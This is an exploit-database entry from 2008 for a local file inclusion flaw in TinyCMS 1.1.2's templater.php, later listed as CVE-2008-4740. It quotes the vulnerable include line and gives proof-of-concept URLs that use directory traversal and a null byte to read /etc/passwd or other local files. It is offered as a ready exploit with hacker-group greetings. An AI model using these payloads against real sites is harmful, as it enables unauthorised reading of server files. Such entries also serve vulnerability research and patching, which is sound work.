Lucene search
COndemnedEDB-ID:6287HistoryAug 21, 2008 - 12:00 a.m.
TinyCMS 1.1.2 - 'templater.php' Local File Inclusion
2008-08-2100:00:00
cOndemned
www.exploit-db.com
37
AI Score
7.4
Confidence
Low
รฏยปยฟ########################################################################################
#
# Name : tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability
# Author : cOndemned [ Dark-Coders ]
# Greetz : Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z
# Conditions : Magic quotes gpc = Off / Register Globals = On
# Other info : Prior versions probably are vulnerable too
#
########################################################################################
Source of /modules/ZZ_Templater/templater.php
[ ... ]
17. $ftemplatedir = 'templates/'.$config['template'].'/';
18. include('templates/'.$config['template'].'/data.php'); // <--- LFI
19. if($tdata['useblocks'] == 1)
[ ... ]
Proof of Concept :
http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00
Jusf 4 fun
# milw0rm.com [2008-08-21]Related
cvelist
cvelist
CVE-2008-4740
2008-10-27 17:00:00
nvd
nvd
CVE-2008-4740
2008-10-27 17:21:27
cve
cve
CVE-2008-4740
2008-10-27 17:21:27
prion
prion
Directory traversal
2008-10-27 17:21:00